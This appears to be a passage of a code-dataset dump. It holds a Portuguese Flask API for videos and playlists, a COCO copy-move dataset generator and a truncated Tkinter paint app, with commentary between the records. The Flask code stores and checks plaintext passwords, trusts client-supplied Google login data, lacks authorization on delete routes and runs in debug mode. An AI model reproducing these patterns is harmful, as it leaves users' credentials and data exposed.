"usage_type": "name"}, {"api_name": "os.chdir", "line_number": 59, "usage_type": "call"}, {"api_name": "dlink.core.main", "line_number": 60, "usage_type": "call"}, {"api_name": "dlink.core", "line_number": 60, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 61, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 65, "usage_type": "call"}, {"api_name": "dlink.core.main", "line_number": 66, "usage_type": "call"}, {"api_name": "dlink.core", "line_number": 66, "usage_type": "name"}, {"api_name": "pytest.main", "line_number": 72, "usage_type": "call"}]}
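The test module above chains fixtures (args depends on populate, which depends on pytest's built-in tmp_path), which is why each test receives a fully prepared directory. A minimal runnable sketch of that pattern with hypothetical fixture names; note that pathlib's '/' operator joins path components, while plain string concatenation builds the file name.

import pytest

@pytest.fixture
def populated_dir(tmp_path):
    # Mirrors the 'populate' fixture above: a directory with five text files.
    base = tmp_path / "base"
    base.mkdir()
    for i in range(5):
        (base / f"{i}.txt").write_text("Foo")
    return base

@pytest.fixture
def file_count(populated_dir):
    # A second fixture that depends on the first, as 'args' does above.
    return len(list(populated_dir.iterdir()))

def test_population(file_count):
    assert file_count == 5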
+{"seq_id": "13020101618", "text": "from flask import Flask, make_response, request\nimport os\nfrom crud import Crud\nfrom routes_helper import RoutesHelper\nfrom flask_cors import CORS\n\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": \"http://127.0.0.1:5000\"}})\n\n@app.route('/api/register', methods=['POST'])\ndef register():\n user_table = Crud('user')\n users = user_table.get_all_elements()\n json = request.json\n user_in_bd = False\n\n if all(key in json.keys() for key in ['email', 'pw', 'name']):\n for user in users:\n if(user['email'] == json['email']):\n user_in_bd = True\n if(not user_in_bd):\n cols, values = RoutesHelper.insert_element('user', json.items())\n user_holder = user_table.getElements_and_operator(cols, values)\n user_row = user_holder[0]\n user_id = user_row['id']\n return make_response({\n 'message': 'Utilizador criado com sucesso.',\n 'user_id': user_id\n }),201\n else:\n return make_response({\"error\": \"Já existe uma conta com este email.\"}), 409\n else:\n message = 'Missing required fields'\n return make_response({'error': message}), 400\n\n\n@app.route('/api/login', methods=['POST'])\ndef login():\n email = request.json.get('email')\n password = request.json.get('pw')\n\n users_table = Crud('user')\n users = users_table.getElements_and_operator(['email', 'pw'], [email, password])\n if(users):\n for user in users:\n if(user['email'] == email and user['pw'] == password):\n message = {\"message\": \"Log in com sucesso.\", 'user_id': user['id']}\n return make_response(message), 200\n message = {'error': 'Email ou Password invalidos. '}\n return make_response(message), 401\n\n@app.route('/api/google/login', methods=['POST'])\ndef login_google():\n req = request.json\n\n name = req.get('name')\n email = req.get('email')\n password = req.get('pw')\n\n if not (name and email and password):\n return make_response({'error':'Está em falta name ou email ou uid no body do request.'})\n\n users_table = Crud('user')\n users = users_table.getElements_and_operator(['email', 'pw'], [email, password])\n\n if(users):\n for user in users:\n if(user['email'] == email and user['pw'] == password):\n message = {\"message\": \"Log in com sucesso.\", 'user_id': user['id']}\n return make_response(message), 200\n \n user_table = Crud('user')\n cols, values = RoutesHelper.insert_element('user', req.items())\n user_holder = user_table.getElements_and_operator(cols, values)\n user_row = user_holder[0]\n user_id = user_row['id']\n return make_response({\n 'message': 'Utilizador criado com sucesso.',\n 'user_id': user_id\n }),201\n\n\n@app.route('/api/user/', methods=['GET'])\ndef get_user(id_user):\n\n user_handler = Crud('user')\n user = user_handler.get_element_by_pk(id_user, 'id')\n\n if user:\n return make_response(user)\n \n return make_response({'error':'Este utilizador não existe.'})\n\n@app.route('/api/videos/', methods=['GET'])\ndef get_video_details(id):\n video_handler = Crud('video')\n video_details = video_handler.get_element_by_pk(id,'id')\n\n if video_details:\n likes_handler = Crud('likes_video')\n like_count = likes_handler.count('id_video', video_details['id']) \n dislikes_handler = Crud('dislikes_video')\n dislikes_count = dislikes_handler.count('id_video', video_details['id'])\n video_details.update({'likes': like_count, 'dislikes': dislikes_count})\n return make_response(video_details), 200\n \n return make_response({'error':'Video nao encontrado.'}), 404\n\n@app.route('/api/videos/view/', methods=['POST'])\ndef 
increment_view(id_video):\n video_handler = Crud('video')\n \n video_details = video_handler.get_element_by_pk(id_video,'id')\n if video_details:\n video_handler.update_element(id_video,['views'], [video_details['views'] + 1], 'id')\n new_video_details = video_handler.get_element_by_pk(id_video,'id')\n \n if new_video_details:\n likes_handler = Crud('likes_video')\n like_count = likes_handler.count('id_video', new_video_details['id']) \n dislikes_handler = Crud('dislikes_video')\n dislikes_count = dislikes_handler.count('id_video', new_video_details['id'])\n new_video_details.update({'likes': like_count, 'dislikes': dislikes_count})\n \n return make_response(new_video_details), 200\n \n return make_response({'error':'Este video não existe.'})\n\n\n@app.route('/api/videos/like', methods=['POST'])\ndef add_like():\n\n id_user = request.json.get('id_user')\n id_video = request.json.get('id_video')\n \n likes_handler = Crud('likes_video')\n user_handler = Crud('user')\n video_handler = Crud('video')\n\n valid_user = user_handler.get_element_by_pk(id_user, 'id')\n valid_video = video_handler.get_element_by_pk(id_video, 'id')\n\n if not valid_user:\n return make_response({'message': f'O utilizador {id_user} não existe.'}), 400\n\n if not valid_video:\n return make_response({'message': f'O video {id_video} não existe.'}), 400\n\n row_likes = likes_handler.get_elements_by_string_field('id_video', id_video)\n \n if id_user in [bd_user_id['id_user'] for bd_user_id in row_likes]:\n return make_response({'message': f'O utilizador {id_user} já deu like neste vídeo.'}), 400\n else:\n likes_handler.insert(['id_user', 'id_video'], [id_user, id_video])\n return make_response({\n 'id_user':id_user,\n 'id_video':id_video,\n 'message': f'O utilizador {id_user} deu like no vídeo de ID {id_video}.'\n }) \n\n\n@app.route('/api/videos/dislike', methods=['POST'])\ndef add_dislike():\n\n id_user = request.json.get('id_user')\n id_video = request.json.get('id_video')\n \n dislikes_handler = Crud('dislikes_video')\n user_handler = Crud('user')\n video_handler = Crud('video')\n\n valid_user = user_handler.get_element_by_pk(id_user, 'id')\n valid_video = video_handler.get_element_by_pk(id_video, 'id')\n\n if not valid_user:\n return make_response({'message': f'O utilizador {id_user} não existe.'}), 400\n\n if not valid_video:\n return make_response({'message': f'O video {id_video} não existe.'}), 400\n\n row_likes = dislikes_handler.get_elements_by_string_field('id_video', id_video)\n \n if id_user in [bd_user_id['id_user'] for bd_user_id in row_likes]:\n return make_response({'message': f'O utilizador {id_user} já deu dislike neste vídeo.'}), 400\n else:\n dislikes_handler.insert(['id_user', 'id_video'], [id_user, id_video])\n return make_response({\n 'id_user':id_user,\n 'id_video':id_video,\n 'message': f'O utilizador {id_user} deu dislike no vídeo de ID {id_video}.'\n }) \n\n@app.route('/api/videos//comments', methods=['GET'])\ndef get_comments(id_video):\n \n comments_handler = Crud('comments_video')\n comments_video = comments_handler.get_elements_by_string_field('id_video', id_video)\n user_handler = Crud('user')\n\n if id_video not in [row['id_video'] for row in comments_video]:\n return make_response({'message': f'O vídeo de ID {id_video} não possui comentários.'}), 404\n\n for row in comments_video:\n user = user_handler.get_element_by_pk(row['id_user'], 'id')\n row.update({'name':user['name']})\n\n return make_response(comments_video)\n\n@app.route('/api/videos//comments', methods=['POST'])\ndef 
add_comment(id_video):\n \n id_user = request.json.get('id_user')\n comment_desc = request.json.get('comment')\n\n user_handler = Crud('user')\n video_handler = Crud('video')\n\n valid_user = user_handler.get_element_by_pk(id_user, 'id')\n valid_video = video_handler.get_element_by_pk(id_video, 'id')\n\n if not valid_user:\n return make_response({'message': f'O utilizador {id_user} não existe.'}), 400\n\n if not valid_video:\n return make_response({'message': f'O video {id_video} não existe.'}), 400\n \n comment_handler = Crud('comments_video')\n comment_handler.insert(['id_user', 'id_video', 'descr'], [id_user, id_video, comment_desc])\n \n return make_response({'message': 'Comentário adicionado com sucesso.'})\n\n@app.route('/api/videos/comments/', methods=['DELETE'])\ndef delete_comment(comment_id):\n comments_handler = Crud('comments_video')\n comment = comments_handler.get_element_by_pk(comment_id, 'id')\n \n if comment:\n comments_handler.delete_element(comment_id, 'id')\n return make_response({'message': f'Comentário de ID {comment_id} foi excluído com sucesso.'}), 200\n \n return make_response({'message': f'O comentário de ID {comment_id} não foi encontrado.'}), 404\n \n@app.route('/api/playlists', methods=['POST'])\ndef create_playlist():\n \n playlist_name = request.json.get('name')\n id_user = request.json.get('id_user')\n \n if playlist_name and id_user:\n user_list_handler = Crud('user_list')\n user_list_handler.insert(['id_user', 'name'],[id_user, playlist_name])\n else:\n return make_response({'message': 'O id do utilizador e o nome da playlist são obrigatórios.'}), 403\n\n\n return make_response({'message': 'Playlist criada com sucesso.'}), 201\n\n@app.route('/api/playlists', methods=['DELETE'])\ndef delete_playlist():\n req = request.json\n list_id = req.get('id')\n if list_id:\n list_handler = Crud('user_list')\n video_handler = Crud('video_list')\n video_handler.delete_element(list_id, 'id_user_list')\n list_handler.delete_element(list_id, 'id')\n return make_response({'message':'Playlist removida com sucesso.'})\n else:\n return make_response({'error':'Id da playlist em falta.'}), 404\n\n@app.route('/api/playlists/videos', methods=['POST'])\ndef add_video_to_playlist():\n \n req = request.json\n id_user_list = req.get('id_user_list')\n id_video = req.get('id_video')\n \n video_handler = Crud('video')\n video_in_db = video_handler.get_element_by_pk(id_video, 'id')\n\n user_list_handler = Crud('user_list')\n user_list_in_db = user_list_handler.get_element_by_pk(id_user_list, 'id')\n\n if not video_in_db:\n return make_response({'error': 'Este video não existe.'})\n \n if not user_list_in_db:\n return make_response({'error': 'Esta playlist não existe.'})\n\n if id_video and id_user_list:\n cols = []\n values = []\n\n for col, value in req.items():\n cols.append(col)\n values.append(value)\n\n handler = Crud('video_list')\n in_db = handler.getElements_and_operator(cols, values)\n if not in_db:\n handler.insert(cols, values)\n return make_response({'message':'Video inserido à playlist com sucesso.'}), 200\n else:\n return make_response({'message':'Este video já existe na playlist.'}), 200\n \n else:\n return make_response({'error': 'Id da playlist ou id do utilizador em falta.'}), 404\n\n@app.route('/api/playlists/videos', methods=['DELETE'])\ndef del_video_from_playlist():\n \n req = request.json\n id_user_list = req.get('id_user_list')\n id_video = req.get('id_video')\n\n if id_video and id_user_list:\n cols = []\n values = []\n\n for col, value in req.items():\n 
cols.append(col)\n values.append(value)\n\n handler = Crud('video_list')\n in_db = handler.getElements_and_operator(cols, values)\n if not in_db:\n return make_response({'error':'Este video não existe na playlist.'}), 200\n else:\n handler.delete_element(in_db[0]['id'], 'id')\n return make_response({'message':'O video foi removido com sucesso.'}), 200\n \n else:\n return make_response({'error': 'Id da playlist ou id do utilizador em falta.'}), 404\n\n@app.route('/api/playlists/', methods=['GET'])\ndef get_playlist(id_user):\n\n playlist_handler = Crud('user_list')\n playlists = playlist_handler.get_elements_by_string_field('id_user', id_user)\n \n if playlists:\n return make_response(playlists)\n \n return make_response({'message': 'Este utilizador não tem playlists.'})\n\n\n@app.route('/api/playlists/videos/', methods=['GET'])\ndef get_videos_from_playlist(id_playlist):\n\n playlist_handler = Crud('video_list')\n videos = playlist_handler.get_elements_by_string_field('id_user_list', id_playlist)\n \n if videos:\n return make_response(videos)\n \n return make_response({'message': 'Esta playlist não existe ou está vazia.'})\n \n@app.route('/api/videos/top/', methods=['GET'])\ndef get_top_vieos(n_top):\n handler = Crud('video')\n result = handler.get_top(n_top, 'views')\n \n if result:\n return make_response(result)\n \n return make_response({'error':'Ups alguma coisa correu mal.'})\n\n@app.route('/api/videos/youtube/', methods=['GET'])\ndef get_video_id_from_id_platform(id_platform):\n handler = Crud('video')\n\n y_video = handler.get_elements_by_string_field('id_platform', id_platform)\n\n if y_video:\n return make_response(y_video[0]), 200\n \n handler.insert(['id_platform', 'platform', 'views'], [id_platform, 'youtube', 0])\n y_video = handler.get_elements_by_string_field('id_platform', id_platform)\n \n if y_video:\n return make_response(y_video[0]), 200\n \n return make_response({'error':'Ups algo correu mal.'}), 400\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=os.getenv(\"PORT\", default=5000))\n", "repo_name": "ThunderShake/sd_api", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 13896, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 9, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "routes_helper.RoutesHelper.insert_element", "line_number": 23, "usage_type": "call"}, {"api_name": "routes_helper.RoutesHelper", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, 
{"api_name": "crud.Crud", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 62, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 64, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 71, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 73, "usage_type": "call"}, {"api_name": "routes_helper.RoutesHelper.insert_element", "line_number": 74, "usage_type": "call"}, {"api_name": "routes_helper.RoutesHelper", "line_number": 74, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 78, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 91, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 93, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 97, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 101, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 106, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 108, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 112, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 120, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 122, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 126, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 128, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 134, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 134, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 135, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 135, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 135, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 137, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 138, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 139, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 145, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 148, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 153, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 156, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 166, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 166, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 166, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 167, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 167, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 167, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 169, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 170, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 171, 
"usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 177, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 180, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 185, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 188, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 197, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 199, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 202, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 208, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 213, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 213, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 213, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 214, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 214, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 214, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 216, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 217, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 223, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 226, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 228, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 231, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 235, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 240, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 242, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 247, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 247, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 247, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 248, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 248, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 248, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 251, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 254, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 257, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 261, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 261, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 264, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 265, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 268, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 270, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 275, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 275, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 279, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 282, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 286, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 289, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 299, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 303, "usage_type": "call"}, {"api_name": 
"flask.make_response", "line_number": 305, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 308, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 313, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 313, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 325, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 328, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 331, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 334, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 339, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 343, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 345, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 351, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 355, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 357, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 361, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 365, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 367, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 371, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 376, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 382, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 384, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 388, "usage_type": "call"}]}
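The /api/register route in the record above loads every user row to check for a duplicate email; a UNIQUE index lets the database enforce that in a single round trip and turns the race between check and insert into a catchable IntegrityError. Because Crud is this project's own helper, the sketch below substitutes plain sqlite3 and is an illustration under stated assumptions, not the repo's API.

import sqlite3
from flask import Flask, request, make_response

app = Flask(__name__)
db = sqlite3.connect(":memory:", check_same_thread=False)
db.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, email TEXT UNIQUE, pw TEXT, name TEXT)")

@app.route("/api/register", methods=["POST"])
def register():
    data = request.get_json(silent=True) or {}
    if not all(k in data for k in ("email", "pw", "name")):
        return make_response({"error": "Missing required fields"}), 400
    try:
        cur = db.execute("INSERT INTO user (email, pw, name) VALUES (?, ?, ?)",
                         (data["email"], data["pw"], data["name"]))
        db.commit()
    except sqlite3.IntegrityError:
        # The unique index on email rejects duplicates atomically.
        return make_response({"error": "An account with this email already exists."}), 409
    return make_response({"message": "User created successfully.", "user_id": cur.lastrowid}), 201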
+{"seq_id": "40566481823", "text": "#数据及的制作\n\"\"\"\n1: 遍历 annotations keys\n2: 获取图片id\n3: 根据图片id获取改张图片信息\n4: 获取annotations的area数据\n5: 根据面积占比对mask进行筛选,跳过面积占比大于10的mask\n6: 获取segmentation信息\n7: 打开原始图片并裁剪得到mask部分\n 裁剪目标方式,性生成一个只有目标的图片m1\n 对图片以及mask图片进行旋转,缩放,确定上下左右移动位置\n 上下左右移动位置方案:\n\n8: 将原始图片和trans——image图片重叠,得到copy move图片\n9: 生成copy move标签\n10: 将训练图片和标签进行同名分文件及保存\n\"\"\"\nimport json\nimport os\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport cv2\nimport numpy as np\nfrom crop_test import get_cm_image_mask, get_new_iamge\nfrom utiles import get_annotations, get_id2info_dic\n\n\ndef main():\n source_image_path = '/home/hewaele/Desktop/coco数据集/val2014'\n annotations_path = '/home/hewaele/Desktop/coco数据集/annotations_trainval2014/annotations/instances_val2014.json'\n images_path = '../cmfd_data/images_v2'\n mask_path = '../cmfd_data/mask_v2'\n id2info_path = '../source_data/id2info_dic.json'\n\n count = 0\n id2info_data = get_id2info_dic(id2info_path)\n annotations = get_annotations(annotations_path)\n for pos, annotation in enumerate(annotations[:]):\n image_id = annotation['image_id']\n image_info = id2info_data[str(image_id)]\n annotation_area = annotation['area']\n # print(image_info['file_name'])\n h, w = image_info['height'], image_info['width']\n if 0.0005 <= annotation_area/(h*w) <= 0.1:\n try:\n #获取mask标注信息\n #[x1 y1, x2, y2, x3, y3 ......]\n segmentation = annotation['segmentation'][0]\n image = Image.open(os.path.join(source_image_path, image_info['file_name']))\n image = np.array(image)\n #获得copy move\n trans_image, trans_mask = get_cm_image_mask(image, np.array(segmentation, np.int32).reshape([-1, 2]))\n\n #将原始图片和trans image合并\n new_image = get_new_iamge(image, trans_image, trans_mask)\n # plt.subplot(221)\n # plt.imshow(image)\n # plt.subplot(222)\n # plt.imshow(trans_image)\n # plt.subplot(223)\n # plt.imshow(trans_mask)\n # plt.subplot(224)\n # plt.imshow(new_image)\n # # plt.scatter(segmentation[::2], segmentation[1::2])\n # plt.show()\n # break\n #\n # #将生成的结果图片保存\n save_image = Image.fromarray(new_image)\n save_mask = Image.fromarray(trans_mask)\n save_image.save(os.path.join(images_path, 'image_'+str(count)+'.png'))\n save_mask.save(os.path.join(mask_path, 'mask_'+str(count)+'.png'))\n print(count)\n count += 1\n\n except:\n print('error')\n\n if count >= 150000:\n break\n\n print(count)\n print('done')\nif __name__ == '__main__':\n main()\n\n", "repo_name": "hewaele/creat_copy_move", "sub_path": "src/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3257, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utiles.get_id2info_dic", "line_number": 36, "usage_type": "call"}, {"api_name": "utiles.get_annotations", "line_number": 37, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 49, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 49, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "crop_test.get_cm_image_mask", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 52, "usage_type": "attribute"}, {"api_name": "crop_test.get_new_iamge", "line_number": 55, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 69, 
"usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 69, "usage_type": "name"}, {"api_name": "PIL.Image.fromarray", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 70, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}]}
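The dataset-generation script above keeps a COCO annotation only when its mask covers between 0.05% and 10% of the image area (the area/(h*w) test). A self-contained sketch of that filter; the dict shapes mimic the COCO fields the script reads, and the sample values are invented for illustration.

def keep_annotation(annotation, image_info, lo=0.0005, hi=0.1):
    # Area ratio of the segmentation mask relative to the whole image.
    h, w = image_info['height'], image_info['width']
    ratio = annotation['area'] / float(h * w)
    return lo <= ratio <= hi

ann = {'area': 1500.0, 'segmentation': [[0, 0, 50, 0, 50, 30]]}
info = {'height': 480, 'width': 640, 'file_name': 'COCO_val2014_example.jpg'}
print(keep_annotation(ann, info))  # True: 1500 / 307200 ~= 0.0049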
+{"seq_id": "42548347334", "text": "from tkinter import *\r\nfrom tkinter import filedialog\r\nfrom tkinter.colorchooser import askcolor\r\nfrom PIL import ImageTk, Image,ImageColor\r\nimport numpy as np\r\nimport matplotlib as mp\r\nimport cv2\r\nclass Paint(object):\r\n\r\n DEFAULT_PEN_SIZE = 5.0\r\n DEFAULT_COLOR = 'black'\r\n\r\n def __init__(self):\r\n self.root = Tk()\r\n self.root.title('Paint')\r\n self.root.geometry('1200x800')\r\n self.root.maxsize(1920,1080)\r\n self.root.minsize(500,300)\r\n self.original_image=0\r\n self.edited_image=0\r\n self.filtered_image=0\r\n self.img = PhotoImage('pen.png') \r\n \r\n self.paint_tools = Frame(self.root,width=250,height=600,relief=RIDGE,borderwidth=2)\r\n self.paint_tools.place(x=0,y=0)\r\n\r\n self.upload_logo = ImageTk.PhotoImage(Image.open('pen.png'))\r\n self.p = Label(self.paint_tools, text=\"Upload\",borderwidth=0,font=('verdana',10,'bold'))\r\n self.p.place(x=50,y=15)\r\n self.pen_button = Button(self.paint_tools,padx=6,image=self.upload_logo,borderwidth=2,command=self.upload_action)\r\n self.pen_button.place(x=5,y=10)\r\n\r\n self.brush_logo = ImageTk.PhotoImage(Image.open('brush.png'))\r\n self.b = Label(self.paint_tools,borderwidth=0,text='brush',font=('verdana',10,'bold'))\r\n self.b.place(x=50,y=45)\r\n self.brush_button = Button(self.paint_tools,image = self.brush_logo,borderwidth=2,command=self.draw_action) \r\n self.brush_button.place(x=5,y=40)\r\n\r\n self.color_logo = ImageTk.PhotoImage(Image.open('color.png'))\r\n self.cl = Label(self.paint_tools, text='color',font=('verdana',10,'bold'))\r\n self.cl.place(x=50,y=75)\r\n self.color_button = Button(self.paint_tools,image = self.color_logo,borderwidth=2,command=self.choose_color)\r\n self.color_button.place(x=5,y=70)\r\n\r\n self.eraser_logo = ImageTk.PhotoImage(Image.open('eraser.png'))\r\n self.e = Label(self.paint_tools, text='eraser',font=('verdana',10,'bold'))\r\n self.e.place(x=50,y=105)\r\n self.eraser_button = Button(self.paint_tools,image = self.eraser_logo,borderwidth=2,command=self.erasef)\r\n self.eraser_button.place(x=5,y=100)\r\n \r\n self.rrotate_logo = ImageTk.PhotoImage(Image.open('right.png').resize((30,30)))\r\n self.e = Label(self.paint_tools, text='right rotate',font=('verdana',10,'bold'))\r\n self.e.place(x=50,y=135)\r\n self.eraser_button = Button(self.paint_tools,image = self.rrotate_logo,borderwidth=2,command=self.rotate_right_action)\r\n self.eraser_button.place(x=5,y=130)\r\n \r\n self.rotateleft_logo = ImageTk.PhotoImage(Image.open('left.png').resize((30,30)))\r\n self.rl = Label(self.paint_tools, text='left rotate',font=('verdana',10,'bold'))\r\n self.rl.place(x=50,y=165)\r\n self.rl_button = Button(self.paint_tools,image = self.rotateleft_logo,borderwidth=2,command=self.rotate_left_action)\r\n self.rl_button.place(x=5,y=160)\r\n \r\n self.translate_logo = ImageTk.PhotoImage(Image.open('translate.png').resize((30,30)))\r\n self.translateimg = Label(self.paint_tools, text='Translate',font=('verdana',10,'bold'))\r\n self.translateimg.place(x=50,y=195)\r\n self.translateimg_button = Button(self.paint_tools,image = self.translate_logo,borderwidth=2,command=self.translate)\r\n 